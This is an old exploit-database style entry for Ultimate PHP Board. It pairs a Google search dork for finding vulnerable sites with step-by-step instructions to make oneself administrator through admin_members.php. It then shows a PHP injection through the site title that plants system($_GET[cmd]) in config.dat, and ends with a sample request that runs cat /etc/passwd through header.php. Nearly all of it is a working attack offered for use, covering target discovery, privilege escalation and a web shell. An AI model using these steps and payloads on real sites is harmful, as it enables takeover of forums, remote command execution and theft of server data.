Google Search: “Powered by UPB” (b 1.0)|(1.0 final)|(Public Beta 1.0b)
rgod rates this entry 10 out of 10.
Submitted: 2005-11-25 00:00:00
Added by: rgod
dork: “Powered by UPB” (b 1.0)|(1.0 final)|(Public Beta 1.0b) this is a very old vulnerability discovered by Xanthic, can’t find it in GHDB and I am surprised of how it still works… register, login, go to: http://[target]/[path_to_upb]/admin_members.php edit your level to 3 (Admin) and some Admin level to 1 (user), logout, re-login and… boom! You see Admin Panel link as I see it? The only link to the advisory that I found is this (in Italian): http://126.96.36.199/search?q=cache:iPdFzkDyS5kJ:www.mojodo.it/mjdzine/zina/numero3/n3f1.txt+xanthic+upb&hl=it and I have remote commads xctn for this now, edit site title with this code: Ultimate PHP Board”; error_reporting(0); ini_set(“max_execution_time”,0); system($_GET[cmd]); echo ” now in config.dat we have: … $title=”Ultimate PHP Board “; error_reporting(0); ini_set(“max_execution_time”,0); system($_GET[cmd]); echo ” “; … in header.php we have: … include “./db/config.dat”; … so you can launch commands: http://[target]/[path]/header.php?cmd=cat%20/etc/passwd